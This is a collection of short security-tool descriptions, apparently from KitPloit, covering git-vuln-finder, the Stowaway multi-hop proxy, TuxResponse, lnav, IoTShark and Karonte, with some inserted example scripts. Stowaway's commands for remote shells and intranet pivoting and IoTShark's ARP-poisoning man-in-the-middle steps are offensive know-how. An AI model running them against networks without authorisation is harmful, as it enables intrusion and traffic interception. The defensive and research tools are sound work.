Channel: KitPloit - PenTest Tools!

Git-Vuln-Finder - Finding Potential Software Vulnerabilities From Git Commit Messages


Finding potential software vulnerabilities from git commit messages. The output is a JSON document listing each commit that could contain a fix for a software vulnerability. The search is based on a set of regular expressions applied to the commit messages only. If CVE IDs are present in a message, they are added automatically to the output.

Requirements
  • Python 3.6
  • GitPython
  • langdetect

Usage
usage: finder.py [-h] [-v] [-r R] [-o O] [-s S] [-p P] [-c] [-t]

Finding potential software vulnerabilities from git commit messages.

optional arguments:
  -h, --help  show this help message and exit
  -v          increase output verbosity
  -r R        git repository to analyse
  -o O        Output format: [json]
  -s S        State of the commit found
  -p P        Matching pattern to use: [vulnpatterns, cryptopatterns,
              cpatterns] - the pattern 'all' is used to match all the patterns
              at once.
  -c          output only a list of the CVE pattern found in commit messages
              (disable by default)
  -t          Include tags matching a specific commit

More info: https://github.com/cve-search/git-vuln-finder

Patterns
git-vuln-finder comes with 3 default patterns which can be selected to find the potential vulnerabilities described in the commit messages:
  • vulnpatterns is a generic vulnerability pattern, especially targeting web applications and generic security commit messages. Based on an academic paper.
  • cryptopatterns is a vulnerability pattern for cryptographic errors mentioned in commit messages.
  • cpatterns is a set of standard vulnerability patterns seen in C/C++-like languages.

A sample partial output from the curl git repository:
python3 finder.py -r /home/adulau/git/curl | jq .
...
"6df916d751e72fc9a1febc07bb59c4ddd886c043": {
"message": "loadlibrary: Only load system DLLs from the system directory\n\nInspiration provided by: Daniel Stenberg and Ray Satiro\n\nBug: https://curl.haxx.se/docs/adv_20160530.html\n\nRef: Windows DLL hijacking with curl, CVE-2016-4802\n",
"language": "en",
"commit-id": "6df916d751e72fc9a1febc07bb59c4ddd886c043",
"summary": "loadlibrary: Only load system DLLs from the system directory",
"stats": {
"insertions": 180,
"deletions": 8,
"lines": 188,
"files": 7
},
"author": "Steve Holme",
"author-email": "steve_holme@hotmail.com",
"authored_date": 1464555460,
"committed_date": 1464588867,
"branches": [
"master"
],
"pattern-selected": "(?i)(denial of service |\bXXE\b|remote code execution|\bopen redirect|OSVDB|\bvuln|\bCVE\b |\bXSS\b|\bReDoS\b|\bNVD\b|malicious|x−frame−options|attack|cross site |exploit|malicious|directory traversal |\bRCE\b|\bdos\b|\bXSRF \b|\bXSS\b|clickjack|session.fixation|hijack|\badvisory|\binsecure |security |\bcross−origin\b|unauthori[z|s]ed |infinite loop)",
"pattern-matches": [
"hijack"
],
"origin": "git@github.com:curl/curl.git",
"origin-github-api": "https://api.github.com/repos/curl/curl/commits/6df916d751e72fc9a1febc07bb59c4ddd886c043",
"tags": [],
"cve": [
"CVE-2016-4802"
],
"state": "cve-assigned"
},
"c2b3f264cb5210f82bdc84a3b89250a611b68dd3": {
"message": "CONNECT_ONLY: don't close connection on GSS 401/407 reponses\n\nPreviously, connections were closed immediately before the user had a\nchance to extract the socket when the proxy required Negotiate\nauthentication.\n\nThis regression was brought in with the security fix in commit\n79b9d5f1a42578f\n\nCloses #655\n",
"language": "en",
"commit-id": "c2b3f264cb5210f82bdc84a3b89250a611b68dd3",
"summary": "CONNECT_ONLY: don't close connection on GSS 401/407 reponses",
"stats": {
"insertions": 4,
"deletions": 2,
"lines": 6,
"files": 1
},
"author": "Marcel Raad",
"author-email": "raad@teamviewer.com",
"authored_date": 1455523116,
"committed_date": 1461704516,
"branches": [
"master"
],
"pattern-selected": "(?i)(denial of service |\bXXE\b|remote code execution|\bopen redirect|OSVDB|\bvuln|\bCVE\b |\bXSS\b|\bReDoS\b|\bNVD\b|malicious|x−frame−options|attack|cross site |exploit|malicious|directory traversal |\bRCE\b|\bdos\b|\bXSRF \b|\bXSS\b|clickjack|session.fixation|hijack|\badvisory|\binsecure |security |\bcross−origin\b|unauthori[z|s]ed |infinite loop)",
"pattern-matches": [
"security "
],
"origin": "git@github.com:curl/curl.git",
"origin-github-api": "https://api.github.com/repos/curl/curl/commits/c2b3f264cb5210f82bdc84a3b89250a611b68dd3",
"tags": [],
"state": "under-review"
},
...
  • Extracting CVE id(s) from git messages
"98d132cf6a879faf0147aa83ea0c07ff326260ed": {
"message": "Add a macro for testing assertion in both debug and production builds\n\nIf we have an assert then in a debug build we want an abort() to occur.\nIn a production build we want the function to return an error.\n\nThis introduces a new macro to assist with that. The idea is to replace\nexisting use of OPENSSL_assert() with this new macro. The problem with\nOPENSSL_assert() is that it aborts() on an assertion failure in both debug\nand production builds. It should never be a library's decision to abort a\nprocess (we don't get to decide when to kill the life support machine or\nthe nuclear reactor control system). Additionally if an attacker can\ncause a reachable assert to be hit then this can be a source of DoS attacks\ne.g. see CVE-2017-3733, CVE-2015-0293, CVE-2011-4577 and CVE-2002-1568.\n\nReviewed-by: Tim Hudson <tjh@openssl.org>\n(Merged from https://github.com/openssl/openssl/pull/3496)",
"commit-id": "98d132cf6a879faf0147aa83ea0c07ff326260ed",
"summary": "Add a macro for testing assertion in both debug and production builds",
"stats": {
"insertions": 18,
"deletions": 0,
"lines": 18,
"files": 1
},
"author": "Matt Caswell",
"author-email": "matt@openssl.org",
"authored_date": 1495182637,
"committed_date": 1495457671,
"branches": [
"master"
],
"pattern-selected": "(?i)(denial of service |\bXXE\b|remote code execution|\bopen redirect|OSVDB|\bvuln|\bCVE\b |\bXSS\b|\bReDoS\b|\bNVD\b|malicious|x−frame−options|attack|cross site |exploit|malicious|directory traversal |\bRCE\b|\bdos\b|\bXSRF \b|\bXSS\b|clickjack|session.fixation|hijack|\badvisory|\binsecure |security |\bcross−origin\b|unauthori[z|s]ed |infinite loop)",
"pattern-matches": [
"attack"
],
"cve": [
"CVE-2017-3733",
"CVE-2015-0293",
"CVE-2011-4577",
"CVE-2002-1568"
],
"state": "cve-assigned"
}
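As an added example (not code from git-vuln-finder itself), the following applies the vulnpatterns expression printed in the sample output above to commit messages and extracts CVE identifiers, producing the pattern-matches, cve and state fields. It collects every distinct match rather than only the first one; the sample messages are taken from the curl and OpenSSL commits shown above (the OpenSSL one shortened), and scan_repo is this example's own helper that walks a repository with GitPython.

```python
import re

# Added example, not git-vuln-finder's own code: apply the 'vulnpatterns'
# expression printed in the sample output to commit messages and extract
# CVE identifiers, producing the 'pattern-matches', 'cve' and 'state' fields.
# Unlike the tool, which records only the first match, every distinct match
# in a message is collected.

# The generic vulnerability pattern exactly as shown in 'pattern-selected'
# above (including its original spacing and non-ASCII hyphens).
VULNPATTERNS = re.compile(
    r"(?i)(denial of service |\bXXE\b|remote code execution|\bopen redirect|OSVDB"
    r"|\bvuln|\bCVE\b |\bXSS\b|\bReDoS\b|\bNVD\b|malicious|x−frame−options|attack"
    r"|cross site |exploit|malicious|directory traversal |\bRCE\b|\bdos\b|\bXSRF \b"
    r"|\bXSS\b|clickjack|session.fixation|hijack|\badvisory|\binsecure |security "
    r"|\bcross−origin\b|unauthori[z|s]ed |infinite loop)"
)

# CVE identifiers: CVE-<year>-<four or more digits>.
CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,}\b", re.IGNORECASE)

# Commit messages quoted from the sample output above (curl, and OpenSSL
# shortened to its last paragraph).
CURL_MSG = ("loadlibrary: Only load system DLLs from the system directory\n\n"
            "Inspiration provided by: Daniel Stenberg and Ray Satiro\n\n"
            "Bug: https://curl.haxx.se/docs/adv_20160530.html\n\n"
            "Ref: Windows DLL hijacking with curl, CVE-2016-4802\n")
OPENSSL_MSG = ("Add a macro for testing assertion in both debug and production builds\n\n"
               "Additionally if an attacker can\ncause a reachable assert to be hit "
               "then this can be a source of DoS attacks\ne.g. see CVE-2017-3733, "
               "CVE-2015-0293, CVE-2011-4577 and CVE-2002-1568.\n")


def analyse_message(message: str, pattern: "re.Pattern" = VULNPATTERNS) -> dict:
    """Return the vulnerability-related fields for one commit message."""
    matches = []
    for m in pattern.finditer(message):
        if m.group(1) not in matches:          # first-seen order, no duplicates
            matches.append(m.group(1))
    cves = []
    for cve in CVE_RE.findall(message):
        cve = cve.upper()
        if cve not in cves:
            cves.append(cve)
    return {
        "summary": message.splitlines()[0] if message else "",
        "pattern-matches": matches,
        "cve": cves,
        # A commit with an ID is 'cve-assigned'; otherwise it stays
        # 'under-review' for a human to confirm or discard.
        "state": "cve-assigned" if cves else "under-review",
    }


def scan_repo(path: str, pattern: "re.Pattern" = VULNPATTERNS, rev: str = "master") -> dict:
    """Walk a local repository with GitPython (as the tool does) and return
    {hexsha: analysis} for every commit whose message matches the pattern.
    This helper is this example's own and needs GitPython installed."""
    from git import Repo   # imported here so the rest runs without GitPython
    results = {}
    for commit in Repo(path).iter_commits(rev):
        if pattern.search(commit.message):
            entry = analyse_message(commit.message, pattern)
            entry["commit-id"] = commit.hexsha
            entry["author"] = commit.author.name
            results[commit.hexsha] = entry
    return results


if __name__ == "__main__":
    for msg in (CURL_MSG, OPENSSL_MSG):
        print(analyse_message(msg))
```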

Acknowledgment
  • Thanks to Jean-Louis Huynen for the discussions about the crypto vulnerability pattern
  • Thanks to Sebastien Tricaud for the discussions regarding native language and commit messages


Stowaway - Multi-hop Proxy Tool For Pentesters


Stowaway is a multi-hop proxy tool for security researchers and pentesters.
Users can easily proxy their network traffic to intranet nodes (multi-layer).
PS: The files under the demo folder are Stowaway's beta version; it is still functional, and you can check the details in the README.md file under the demo folder.
This tool is limited to security research and teaching, and the user bears all legal and related responsibilities caused by the use of this tool! The author does not assume any legal or related responsibilities!

Features
  • obvious node topology
  • multi-hop socks5 traffic proxy
  • multi-hop ssh traffic proxy
  • remote interactive shell
  • network traffic encryption with AES-256(CBC mode)
  • support macos and linux

Usage

Stowaway can be executed in two modes: admin and agent.
If you don't want to compile the project yourself, you can check the release folder to get one!
Simple example:
  Admin mode: ./stowaway admin -l 9999 -s 123

Meaning:
  • admin: Stowaway is started in admin mode
  • -l: Stowaway listens on port 9999 and waits for incoming connections
  • -s: Stowaway uses 123 as the encryption key during communication

Be aware! The -s option's value must be the same as the agents'.

For now, only the three options above are supported!

  Agent mode: ./stowaway agent -m 127.0.0.1:9999 -l 10000 --startnode -s 123 -r

Meaning:
  • agent: Stowaway is started in agent mode
  • -m: the address of Stowaway's monitor node (in this case, the node we started above)
  • -l: Stowaway listens on port 10000 and waits for incoming connections
  • -s: Stowaway uses 123 as the encryption key during communication
  • --startnode: Stowaway is started as the FIRST agent node (if the node is the first one, you MUST add this option!!! There are two submodes of agent mode; if you want to start the second, third, ... node, just remove this option)
  • -r: start the node in reverse mode (for instance, you can add node 2 into the net by having node 1 actively connect to node 2, instead of node 1 just waiting for the connection from node 2)

Be aware! The -s option's value must be the same as the agents'.

For now, only the five options above are supported!
Example
For instance (one admin, one startnode, two simple nodes):
Admin

Startnode

First simple Node (setting as reverse mode)

Now, in admin, type "use 1" -> "connect 127.0.0.1:10001"; then node 1 is added into the net.
Second simple Node

When all agent nodes are connected, check the topology in admin

Now we manipulate the second simple node through admin

Open the remote interactive shell

Now you can use interactive shell (the second simple node's) through admin
Start socks5 proxy service

Now you can use the admin's port 7777 as the socks5 proxy service.
It proxies your traffic to the second simple node, which does the work as the socks server (when you want to shut down this socks5 service, just type "stopsocks" in this mode to turn it off).
Open ssh

It proxies your ssh traffic to the second simple node, which does the work as the ssh client.
PS: In this function, you can type pwd to check where you currently are.
For more detail, just type help to get further information.

Attention
  • This project is coded just for fun; the logic and code structure are not strict enough, so please don't be too serious about it
  • When the admin goes offline, all agent nodes go offline too (this may be changed in the future)
  • When one of the agents goes offline, the agent nodes after it go offline
  • Once the admin has started, you need to connect at least one agent node to it before you do any operations
  • If you want to compile this project to support more platforms, you can use go build -ldflags="-w -s" to do that
  • Windows is temporarily not supported

Thanks

TuxResponse - Linux Incident Response


TuxResponse is an incident response script for Linux systems written in bash. It can automate incident response activities on Linux systems and enable you to triage systems quickly, without compromising on the results. Usually corporate systems have some kind of monitoring and control, but there are exceptions due to shadow IT and non-standard images deployed in corporations. What amounts to typing 10 commands with trial and testing can be done at the press of a button.

Tested on:
  • Ubuntu 14+
  • CentOS 7+
Primary purpose:
  • Take advantage of built-in tools and functionality in Linux (tools like dd, awk, grep, cat, netstat, etc)
  • Reduce the amount of commands incident responder needs to remember/use in response scenario.
  • Automation
External tools in the package:
  • LiME
  • Exif
  • chkrootkit
  • Yara + Linux scanning rules (needs network to fetch the repo)

Example automation:
INSTALL LiME
function init_lime(){
    # Install the build dependencies for the kernel module (RPM- or Debian-based).
    if [ -f /usr/bin/yum ]; then
        yum -y install make kernel-headers kernel-devel gcc
    elif [ -f /usr/bin/apt-get ]; then
        apt-add-repository universe
        apt-get -y install make linux-headers-$(uname -r) gcc
    fi

    # Fetch the LiME 1.8.1 source archive and unpack it into the current directory.
    rm -f /tmp/v1.8.1.zip
    wget -P/tmp https://github.com/504ensicsLabs/LiME/archive/v1.8.1.zip
    unzip /tmp/v1.8.1.zip
    rm -f /tmp/v1.8.1.zip

    # Build the module for the running kernel and keep only lime.ko in /tmp.
    pushd LiME-1.8.1/src
    make
    mv lime-*.ko /tmp/lime.ko
    popd
    rm -rf LiME-1.8.1
}
When responding to incidents, if you have to install LiME by manually typing all the commands, that will slow you down significantly.

Functionality

1) Live Response

   1) Footprint System
      1) System info, IP, date, time, local TZ, last boot - 'hostnamectl; who -b; uname -a; uptime; ifconfig; date; last reboot'

   2) File System Tools
      1) Check mounted filesystems - 'df -h'
      2) Hash executables (MD5) - 'find /usr/bin -type f -exec file "{}" \; | grep -i "elf" | cut -f1 -d: | xargs -I "{}" -n 1 md5sum {}'
      3) Modified files - 'modified_files_period_select' (calling a function in tuxresponse.sh)
      4) List all hidden directories - 'find / -type d -name "\.*"'
      5) Files/dirs with no user/group name - 'find / \( -nouser -o -nogroup \) -exec ls -l {} \; 2>/dev/null'
      6) Changed files from packages - 'packaged_files_changed' (calling a function in tuxresponse.sh)

   3) YARA, CHKROOTKIT, EXIFTool
      1) Check for rootkits - runs 'chkrootkit'
      2) Yara scan - calling the tuxresponse.sh function 'yara_select' (scans the system with all YARA Linux rules available in the master repo)
      3) EXIFTool - calling the tuxresponse.sh function 'exiftool_select' (installs EXIFTool)

   4) Process Analysis Tools
      1) List running processes - 'ps -axu'
      2) Deleted binaries still running - 'ls -alR /proc/*/exe 2> /dev/null | grep deleted'
      3) Active network connections (TCP, UDP) - 'ss -tunap | sed "s/[ \t]\+/|/g"'
      4) Dump process based on PID - 'dump_process_select' (calling a function in tuxresponse.sh)
         1) Enter PID to dump: **(this is the command executed - gcore -a -o "${DUMP_FILE}" ${DUMP_PID})**
      5) Processes running from /tmp, /dev - 'ls -alR /proc/*/cwd 2> /dev/null | grep -E "tmp|dev"'

   5) Network Connections Analysis
      1) List all active network connections/raw sockets - 'netstat -nalp; netstat -plant'

   6) Users
      1) List all users connected to the system - 'w'
      2) Get users with passwords - 'getent passwd'

   7) Bash
      1) Check bash history file - 'cat ~/.bash_history | nl'

   8) Evidence Of Persistence
      1) List all cron jobs - 'list_all_crontab' (calling a function in tuxresponse.sh)
      2) List all on-startup/boot programs - 'list_all_onstartup' (calling a function in tuxresponse.sh)

   9) Dump All Logs (/var/log)
      1) Dump users' .bash_history - 'cat_all_bash_history' (calling a function in tuxresponse.sh)
      2) Find logs with binary inside - 'grep [[:cntrl:]] /var/log/*.log'

2) Connect To Target - use SSH to transfer the script and analyze a remote system.
   This option lets you connect to a remote system, copy over all scripts and tools, and analyze the system.

3) Take Memory Dump (LKM LiME)
   This option compiles LiME from source and dumps the system's RAM. This is the easiest way to do it, as the alternative would be to compile from source for all major kernel versions in advance and insert the LKM.

4) Take Disk Image (DD)
   This option takes a full disk image of the target system using the well-known tool dd. The function takes source and destination as parameters and inserts them into the following command: 'dd if=${IMAGE_IN} | pv | dd of='${IMAGE_OUT}' bs=4K conv=noerror,sync'. If you're investigating a remote system, the script copies itself there. Then, if the parameter ${TARGET_HOST} is set, the script downloads the image to the analyst's system using this command: "ssh -p${TARGET_PORT} ${TARGET_USER}@${TARGET_HOST} 'dd if=${IMAGE_IN} bs=4K conv=noerror,sync' | pv | dd of='${IMAGE_OUT}'" (I'm heavily using pv to make sure progress is tracked).

5) Generate HTML Report
   Everything you do is recorded in text files, so it is easy to go back and look at the output. The beauty of this is that you can upload it to your favourite log analysis tools and make sense of it at a later stage. On top of that, you can use this function to generate an HTML report and look at the command-generated output in a more human-readable form.

6) Install Software
   Install binaries that are required by the script to function correctly.
   1) Dependencies
   2) Yara and rules
   3) ExifTool
   4) Init check
   5) chkrootkit
   6) LiME
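The "Find logs with binary inside" check above ('grep [[:cntrl:]] /var/log/*.log') also flags TAB, which is a normal separator in many logs, and its unquoted bracket expression is exposed to shell globbing. As an added example (not part of TuxResponse), here is a stricter Python version that ignores TAB/LF/CR and UTF-8 bytes, counts NUL and other control bytes per file and reports the first offending line numbers; demo() builds constructed sample log files in a temporary directory rather than reading /var/log.

```python
import os
import shutil
import tempfile
from pathlib import Path

# Added example, not TuxResponse's own code: a stricter version of its
# "Find logs with binary inside" check. TAB, LF and CR are normal in text
# logs; NUL and other control bytes (for example terminal escape sequences
# that hide lines from 'cat' or 'less') are what an analyst wants flagged.

ALLOWED_CONTROL = {0x09, 0x0A, 0x0D}   # TAB, LF, CR


def count_binary_bytes(data: bytes) -> int:
    """Count control bytes other than TAB/LF/CR, plus DEL (0x7F).
    Bytes >= 0x80 are assumed to be UTF-8 text and are not counted."""
    return sum(1 for b in data
               if (b < 0x20 and b not in ALLOWED_CONTROL) or b == 0x7F)


def offending_lines(data: bytes, limit: int = 5) -> list:
    """1-based numbers of the first `limit` lines that contain such bytes."""
    found = []
    for number, line in enumerate(data.split(b"\n"), start=1):
        if count_binary_bytes(line):
            found.append(number)
            if len(found) == limit:
                break
    return found


def find_binary_logs(log_dir, suffix: str = ".log") -> list:
    """Return [(count, path, first_lines), ...] sorted by path for every
    regular file under log_dir whose name ends with suffix and that
    contains at least one flagged byte."""
    hits = []
    for path in sorted(Path(log_dir).rglob("*" + suffix)):
        if not path.is_file():
            continue
        data = path.read_bytes()
        count = count_binary_bytes(data)
        if count:
            hits.append((count, str(path), offending_lines(data)))
    return hits


def demo() -> list:
    """Run the check over constructed sample files (not real /var/log data)
    and return the hits with directory-independent file names."""
    tmp = tempfile.mkdtemp()
    samples = {
        "auth.log": b"Jan  1 00:00:01 host sshd[42]: Accepted publickey for alice\n",
        "tabbed.log": b"field1\tfield2\tfield3\n",                         # TAB only: clean
        "utf8.log": "Jan  1 00:00:02 host app: caf\u00e9\n".encode(),     # UTF-8: clean
        "ansi.log": b"Jan  1 00:00:03 host kernel: \x1b[31mpanic\x1b[0m\n",  # 2 ESC bytes
        "nul.log": b"ok\nJan  1 00:00:04 host app: \x00\x00\x00\n",          # 3 NUL bytes on line 2
        "notes.txt": b"\x00",                                             # wrong suffix: ignored
    }
    for name, content in samples.items():
        Path(tmp, name).write_bytes(content)
    try:
        return [(n, os.path.basename(p), lines)
                for n, p, lines in find_binary_logs(tmp)]
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for count, name, lines in demo():
        print(f"{count:4d} flagged byte(s) in {name} (lines {lines})")
```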


LNAV - Log File Navigator


The log file navigator, lnav, is an enhanced log file viewer that takes advantage of any semantic information that can be gleaned from the files being viewed, such as timestamps and log levels. Using this extra semantic information, lnav can do things like interleave messages from different files, generate histograms of messages over time, and provide hotkeys for navigating through the file. It is hoped that these features will allow the user to quickly and efficiently zero in on problems.

Prerequisites
The following software packages are required to build lnav:
  • gcc/clang - A C++14-compatible compiler.
  • libpcre - The Perl Compatible Regular Expression (PCRE) library.
  • sqlite - The SQLite database engine. Version 3.9.0 or higher is required.
  • ncurses - The ncurses text UI library.
  • readline - The readline line editing library.
  • zlib - The zlib compression library.
  • bz2 - The bzip2 compression library.
  • libcurl - The cURL library for downloading files from URLs. Version 7.23.0 or higher is required.

Installation
Lnav follows the usual GNU style for configuring and installing software:
$ ./configure
$ make
$ sudo make install
Run ./autogen.sh before running any of the above commands when compiling from a cloned repository.

Cygwin users
It should compile fine in Cygwin.
Alternatively, you can get the generated binary from AppVeyor artifacts.
Remember that you still need the lnav dependencies under Cygwin, here is a quick way to do it:
setup-x86_64.exe -q -P libpcre1 -P libpcrecpp0 -P libsqlite3_0 -P libstdc++6
Currently, the x64 version seems to be working better than the x86 one.

Usage
The only file installed is the executable, lnav. You can execute it with no arguments to view the default set of files:
$ lnav
You can view all the syslog messages by running:
$ lnav /var/log/messages*

Usage with systemd-journald
On systems running systemd-journald, you can use lnav as the pager:
$ journalctl | lnav
or in follow mode:
$ journalctl -f | lnav
Since journalctl's default output format omits the year, if you are viewing logs which span multiple years you will need to change the output format to include the year, otherwise lnav gets confused:
$ journalctl -o short-iso | lnav
It is also possible to use journalctl's json output format and lnav will make use of additional fields such as PRIORITY and _SYSTEMD_UNIT:
$ journalctl -o json | lnav
If some MESSAGE fields contain special characters such as ANSI color codes, which journalctl considers unprintable, specifying journalctl's -a option might be preferable so that those messages are still output in a non-binary representation:
$ journalctl -a -o json | lnav
If using systemd v236 or newer, the output fields can be limited to the ones actually recognized by lnav for increased efficiency:
$ journalctl -o json --output-fields=MESSAGE,PRIORITY,_PID,SYSLOG_IDENTIFIER,_SYSTEMD_UNIT | lnav
If your system has been running for a long time, for increased efficiency you may want to limit the number of log lines fed into lnav, e.g. via journalctl's -n or --since=... options.
In case of a persistent journal, you may want to limit the number of log lines fed into lnav via journalctl's -b option.

See Also
The lnav website can be found at:
http://lnav.org
Angle-grinder is a tool to slice and dice log files on the command-line. If you're familiar with the SumoLogic query language, you might find this tool more comfortable to work with.


IotShark - Monitoring And Analyzing IoT Traffic


IoTShark is an IoT monitoring service that allows users to monitor their IoT devices for trends in the data sent and received. Ordinarily, setting up a man-in-the-middle capture with the proper configuration can take quite a bit of time, and may seem dauntingly impossible for those with little to no experience in computer security or even computer science.
IoTShark aims to provide a [nearly] fully automated solution for a user to monitor their IoT devices by simply running a single script. The user merely has to select which device they wish to monitor, and this program takes care of the rest of the heavy work by starting the ARP poisoning and setting up the packet forwarding and the man-in-the-middle packet sniffer. It also has an easy-to-understand, interactive web UI where a user can filter the packets based on ports, types, and timestamps to get a broader understanding of how much is being transmitted and when.
We also aim to classify certain kinds of data such as heartbeat messages, data transfers, and anomalies, though the last one will likely be demonstrated on the unencrypted RPi test, since it is difficult to do anomaly detection without huge amounts of data (and we would require many devices and individuals to gather that much data).

How to run:
  1. Install the required libraries: $ pip3 install -r requirements.txt
  2. Set up IP forwarding: $ sudo sysctl net.inet.ip.forwarding=1
  3. Run the app: $ sudo python3 mitm_main.py

The Main Script
Create a Python virtual environment and install the dependency packages:
virtualenv --python=`which python3` venv
source venv/bin/activate
pip install -r requirements.txt
Make sure packet forwarding is enabled on your local machine. This is necessary for the man-in-the-middle attack to work. On macOS this can be done with:
sudo sysctl net.inet.ip.forwarding=1
Run the main program mitm_main.py. See that script for accepted options.
Currently this program does the following:
  1. Scan for all hosts either in the subnet given by the -s option or in a set of common residential subnets
  2. Discover the hardware vendor and OS of each host
  3. Perform ARP poisoning between the selected host and the gateway router
  4. Output graphs of past captured data with the -f option followed by the relative path to the csv file
After ARP poisoning is running, you can examine traffic from the target device by Wireshark with a display filter like:
(ip.src==192.168.0.215 or ip.dst==192.168.0.215) and tcp.port != 443

Data File Format
The captured data is stored in a csv file with the following format:
{timestamp, incoming_bytes, outgoing_bytes, srcport, dstport, transfer_protocol, connection_protocol, srcip, dstip}
123123213, 0, 240, 36, 80, 65124, HTTP, UDP, 192.168.0.215, 104.24.4.5
123123240, 300, 0, 800, 443, 65125, HTTPS, TCP, 104.24.4.5, 192.168.0.215
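As an added example (not IoTShark's own code) of what can be done with this file: parse rows in the layout above and group the traffic per remote endpoint, then label an endpoint a heartbeat candidate when the monitored device sends it small, near-constant-size packets at a near-constant interval, and a transfer otherwise. SAMPLE_CSV is constructed data laid out to match the nine-field header above, and the thresholds (max_bytes, max_cv, min_packets) are this example's assumptions.

```python
import csv
import io
import statistics
from collections import defaultdict

# Added example, not IoTShark's own code: read the capture CSV layout described
# above and classify each remote endpoint the monitored device talks to.
# Thresholds (max_bytes, max_cv, min_packets) are this example's assumptions.

FIELDS = ["timestamp", "incoming_bytes", "outgoing_bytes", "srcport", "dstport",
          "transfer_protocol", "connection_protocol", "srcip", "dstip"]

# Constructed sample following the nine-field header (not a real capture):
# a device at 192.168.0.215 pinging 104.24.4.5:443 every 30 s with ~64-byte
# packets, plus a burst of large uploads to 104.24.4.6:80.
SAMPLE_CSV = """\
1000, 0, 64, 50001, 443, HTTPS, TCP, 192.168.0.215, 104.24.4.5
1005, 0, 1400, 50002, 80, HTTP, TCP, 192.168.0.215, 104.24.4.6
1006, 0, 1400, 50002, 80, HTTP, TCP, 192.168.0.215, 104.24.4.6
1007, 0, 900, 50002, 80, HTTP, TCP, 192.168.0.215, 104.24.4.6
1030, 0, 64, 50001, 443, HTTPS, TCP, 192.168.0.215, 104.24.4.5
1031, 120, 0, 443, 50001, HTTPS, TCP, 104.24.4.5, 192.168.0.215
1050, 0, 1400, 50002, 80, HTTP, TCP, 192.168.0.215, 104.24.4.6
1060, 0, 66, 50001, 443, HTTPS, TCP, 192.168.0.215, 104.24.4.5
1090, 0, 64, 50001, 443, HTTPS, TCP, 192.168.0.215, 104.24.4.5
1120, 0, 64, 50001, 443, HTTPS, TCP, 192.168.0.215, 104.24.4.5
"""


def parse_capture(text: str) -> list:
    """Parse CSV rows into dicts with numeric fields; a header line is skipped."""
    rows = []
    reader = csv.DictReader(io.StringIO(text.strip()), fieldnames=FIELDS,
                            skipinitialspace=True)
    for r in reader:
        if r["timestamp"] is None or not r["timestamp"].lstrip("{").isdigit():
            continue                     # header line such as "{timestamp, ...}"
        rows.append({
            "timestamp": int(r["timestamp"]),
            "incoming_bytes": int(r["incoming_bytes"]),
            "outgoing_bytes": int(r["outgoing_bytes"]),
            "srcport": int(r["srcport"]),
            "dstport": int(r["dstport"]),
            "transfer_protocol": r["transfer_protocol"],
            "connection_protocol": r["connection_protocol"],
            "srcip": r["srcip"],
            "dstip": r["dstip"],
        })
    return rows


def classify_endpoints(rows: list, device_ip: str, max_bytes: int = 200,
                       max_cv: float = 0.1, min_packets: int = 4) -> dict:
    """Group rows by remote endpoint ("ip:port/proto"). An endpoint is labelled
    'heartbeat' when the device sent it at least min_packets packets, none
    larger than max_bytes, and the coefficient of variation (pstdev/mean) of
    the inter-arrival times is at most max_cv; everything else is 'transfer'."""
    groups = defaultdict(lambda: {"packets": 0, "bytes": 0,
                                  "out_times": [], "out_sizes": []})
    for r in rows:
        if r["srcip"] == device_ip:            # device -> remote
            key = f'{r["dstip"]}:{r["dstport"]}/{r["connection_protocol"]}'
            groups[key]["out_times"].append(r["timestamp"])
            groups[key]["out_sizes"].append(r["outgoing_bytes"])
        else:                                  # remote -> device
            key = f'{r["srcip"]}:{r["srcport"]}/{r["connection_protocol"]}'
        groups[key]["packets"] += 1
        groups[key]["bytes"] += r["incoming_bytes"] + r["outgoing_bytes"]

    result = {}
    for key, g in groups.items():
        times = sorted(g["out_times"])
        intervals = [b - a for a, b in zip(times, times[1:])]
        mean_interval = statistics.mean(intervals) if intervals else 0.0
        cv = (statistics.pstdev(intervals) / mean_interval
              if mean_interval else float("inf"))
        regular = (len(times) >= min_packets
                   and max(g["out_sizes"]) <= max_bytes
                   and cv <= max_cv)
        result[key] = {"packets": g["packets"], "bytes": g["bytes"],
                       "mean_interval": round(mean_interval, 1),
                       "label": "heartbeat" if regular else "transfer"}
    return result


if __name__ == "__main__":
    summary = classify_endpoints(parse_capture(SAMPLE_CSV), "192.168.0.215")
    for endpoint, info in summary.items():
        print(endpoint, info)
```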

Using the Tool to Sniff IoT Devices
For example, here is a long string that we can say to an Alexa Echo Dot or Google Home while sniffing their traffic. Pay attention to whether the device is transmitting data before the wake word.


Karonte - A Static Analysis Tool To Detect Multi-Binary Vulnerabilities In Embedded Firmware


Karonte is a static analysis tool to detect multi-binary vulnerabilities in embedded firmware.

Research paper
We present our approach and the findings of this work in the following research paper:
KARONTE: Detecting Insecure Multi-binary Interactions in Embedded Firmware[PDF]
Nilo Redini, Aravind Machiry, Ruoyu Wang, Chad Spensky, Andrea Continella, Yan Shoshitaishvili, Christopher Kruegel, Giovanni Vigna. To appear in Proceedings of the IEEE Symposium on Security & Privacy (S&P), May 2020
If you use Karonte in a scientific publication, we would appreciate citations using this Bibtex entry:
@inproceedings{redini_karonte_20,
author = {Nilo Redini and Aravind Machiry and Ruoyu Wang and Chad Spensky and Andrea Continella and Yan Shoshitaishvili and Christopher Kruegel and Giovanni Vigna},
booktitle = {To appear in Proceedings of the IEEE Symposium on Security & Privacy (S&P)},
month = {May},
title = {KARONTE: Detecting Insecure Multi-binary Interactions in Embedded Firmware},
year = {2020}
}

Repository Structure
There are four main directories:
  • tool: karonte python files
  • firmware: karonte firmware dataset
  • configs: configuration files to analyze the firmware samples in the dataset
  • eval: scripts to run the various evaluations on karonte

Run Karonte
To run karonte, from the root directory, just run
SYNOPSIS
    python tool/karonte.py JSON_CONFIG_FILE [LOG_NAME]
DESCRIPTION
    runs karonte on the firmware sample represented by the JSON_CONFIG_FILE, and saves the results in LOG_NAME
EXAMPLE
    python tool/karonte.py config/NETGEAR/r_7800.json
    It runs karonte on the R7800 NETGEAR firmware
By default, results are saved in /tmp/ with the suffix Karonte.txt.
To inspect the generated alerts, just run:
      python tool/pretty_print.py LOG_NAME

Docker
A dockerized version of Karonte ready to use can be found here

Dataset
You can obtain Karonte dataset at this link


CHAPS - Configuration Hardening Assessment PowerShell Script


